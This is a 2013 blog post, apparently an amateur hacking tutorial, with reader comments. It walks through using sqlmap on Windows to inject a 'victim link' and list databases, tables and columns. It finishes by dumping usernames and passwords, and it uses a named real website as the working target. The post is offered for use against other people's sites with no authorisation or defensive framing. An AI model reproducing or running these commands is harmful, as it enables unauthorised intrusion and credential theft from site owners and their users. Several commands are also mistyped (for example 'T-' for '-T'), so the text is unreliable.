Friday, 18 January 2013

Sqlmap Tutorial For Window 7


Hello Im Eagle Eye

Today im gonna teach you about sqlmap on windows 7

-----------------------------------------------------------------------------------------------------------

What do you need?
[python download for windows]
[Sqlmap windows]
First.. After you download and install python you must download Sqlmap for windows
After download it .. [Sqlmap Windows]
extract the file in Drive C

-----------------------------------------------------------------------------------------------------------

After that open your Command Promp (CMD)
Type   cd\
And then press ENTER
Type cd sqlmap\
And Enter

Copy your victim link
And type to cmd like this

sqlmap.py -u http://yoursite.com/index.php?id=123 --dbs

Replace http://yoursite.com/index.php?id=123 to your link target
Enter!

-----------------------------------------------------------------------------------------------------------

The injected site will show the Database
My testing site http://ditto3d.com/gallery.php?id=7
Example Database Shown Is : ditto3d
                                              information_schema

If you want choose any database
you must do like shown above
sqlmap.py -u http://yoursite.com/index.php?id=123=7 -D databasename

-----------------------------------------------------------------------------------------------------------

-D (for Database)
databasename for example i put 'ditto3d' for get the table
So my site will like this

sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d --tables

For your site
--> sqlmap.py -u http://yoursite.com/index.php?id=123 -D your database --tables
Press Enter!

you will get a lot of tables
such as

[ users ]
[ category ]
[ links ]

from the tables , choose one of your target to get Username and Password

then your code in cmd will be like this

sqlmap.py -u http://www.yoursite.com/index.php?id=123 -D database -T your target tables

My code in cmd will shown like
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d -T users

-----------------------------------------------------------------------------------------------------------

Alright , we go to the next
what you must do is to get column
just add --columns after your code
it will be show like this

sqlmap.py -u http://www.yoursite.com/index.php?id=123 -D database T- your target tables --columns

Example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d T- users --columns

-----------------------------------------------------------------------------------------------------------

The tables will show the columns
such as users contain :

[ email ]
[ id ]
[ name ]
[ username ]
[ password ]

what you must to do is
adding   -C username --dump   behind

example :

sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d -T users -C username --dump

Yes you get it
Username is : blablabla

then do the same thing , but this to get 'password'
Example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d T- users -C password --dump

The password is : blablabla

-----------------------------------------------------------------------------------------------------------
Warning! : If you get the database , tables and columns
''  --  '' this string must be a one
such as like this

from database
--> after injected
--> the database are showed

the word database and the double string ( -- )
will be change
it will be like -D
the word database will short and be D
the word D must be a big word

-T   /  -C

( --dump ) do not change this string

After the big word such as -D
You must give one space

--->   -D database

-----------------------------------------------------------------------------------------------------------

THE END !

7 comments:


  1. File "sqlmap.py", line 92
    except exceptionsTuple, e:
    ^
    SyntaxError: invalid syntax

    what the solution for this?

    ReplyDelete
    Replies
    1. What is your python version it will ok 2.7

      Delete
    2. I too have experienced the same thing in windows 7. after downgrade python to version 2.7.5 everything running well..

      Delete
    3. dont use any other version of python except 2.7.That will solve the prob

      Delete
  2. if you cant understand then follow this tutorial
    Web Hacking: SQLMAP tutorial

    ReplyDelete
  3. You have to add the word python before the link.. Surely it works... Enjoy Guys...

    Eg: python sqlmap.py -u http://yoursite.com/index.php?id=123 --dbs

    ReplyDelete